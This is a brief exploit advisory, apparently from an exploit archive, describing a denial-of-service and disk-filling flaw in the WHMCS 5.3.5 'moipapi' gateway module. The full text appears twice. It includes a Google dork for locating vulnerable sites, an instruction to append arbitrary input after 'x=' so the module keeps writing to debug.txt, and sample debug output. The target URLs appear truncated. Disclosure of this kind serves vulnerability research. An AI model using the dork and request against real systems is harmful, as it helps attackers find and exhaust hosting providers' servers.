WHMCS has been notified.
# Exploit Title: WHMCS Moipapi DoS & Memory Consumption Vulnerability 5.3.5
# Google Dork: inurl:/modules/gateways/
-intext:"Gateway Module "moipapi" Not Activated"
# Date: 23/7/2014
# Exploit Author: surivaton
# Vendor Homepage: whmcs.com
# Version: 5.3.5
# Tested on: Linux, Windows
Possible denial of service with memory consumption and taking up disc space
URL: www.whmcshostedsite.com/
Enter what ever you want after x=
Writes to debug.txt in same directory:
www.whmcshostedsite.com/
What appears in debug.txt(a tad over 200 bytes):
------------------------------
POST received:
Array
(
)
------------------------------
Return MoIP data Invoice:
Date: 22/07/2014 09:36:53
Status []
Started payment.
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
# Exploit Title: WHMCS Moipapi DoS & Memory Consumption Vulnerability 5.3.5
# Google Dork: inurl:/modules/gateways/
-intext:"Gateway Module "moipapi" Not Activated"
# Date: 23/7/2014
# Exploit Author: surivaton
# Vendor Homepage: whmcs.com
# Version: 5.3.5
# Tested on: Linux, Windows
Possible denial of service with memory consumption and taking up disc space
URL: www.whmcshostedsite.com/
Enter what ever you want after x=
Writes to debug.txt in same directory:
www.whmcshostedsite.com/
What appears in debug.txt(a tad over 200 bytes):
------------------------------
POST received:
Array
(
)
------------------------------
Return MoIP data Invoice:
Date: 22/07/2014 09:36:53
Status []
Started payment.
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information